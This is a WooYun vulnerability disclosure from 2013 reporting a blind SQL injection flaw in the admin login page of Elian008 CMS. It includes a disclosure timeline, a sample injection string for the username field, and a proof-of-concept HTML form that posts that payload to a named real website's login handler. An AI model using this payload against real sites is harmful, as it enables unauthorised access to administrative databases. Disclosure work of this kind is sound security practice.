当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034188

漏洞标题:Elian008-CMS管理后台登陆存在SQL注射漏洞

相关厂商:Elian008 CMS

漏洞作者: 路人甲

提交时间:2013-08-12 17:54

修复时间:2013-11-10 17:55

公开时间:2013-11-10 17:55

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-12: 细节已通知厂商并且等待厂商处理中
2013-08-16: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向第三方安全合作伙伴开放
2013-10-10: 细节向核心白帽子及相关领域专家公开
2013-10-20: 细节向普通白帽子公开
2013-10-30: 细节向实习白帽子公开
2013-11-10: 细节向公众公开

简要描述:

该网站后台登陆页面,存在盲注漏洞。

详细说明:

http://www.tmfc.com.cn/elian/AdminLogin.asp 页面的用户名因过滤不严存在盲注漏洞。 例如用户名输入: admin' and exists( SELECT count(*) FROM admins) and '1'='1, 密码随便填。

漏洞证明:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>CMS 网站后台协作平台</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gbk" /><LINK
href="pic/style.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.2900.3199" name=GENERATOR></HEAD>
<BODY>
<FORM name="form1" action="http://www.tmfc.com.cn/elian%5cCheckLogin.asp" method="post">
管理帐号:<br />
<textarea name="LoginName" id="LoginName" class="input2" type="text" style="width: 600px;height:200px">
admin' and exists(select count(*) from admin) and '1'='1
</textarea>
<br />
管理密码:<br />
<input class=input2 id=Password type=text maxlength=12 name=LoginPassword value="123">
<br />
<INPUT id=imageField type=submit name=imageField>
<br />
</FORM>


1.png


2.png

修复方案:

NULL

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-16 23:23

厂商回复:

最新状态:

暂无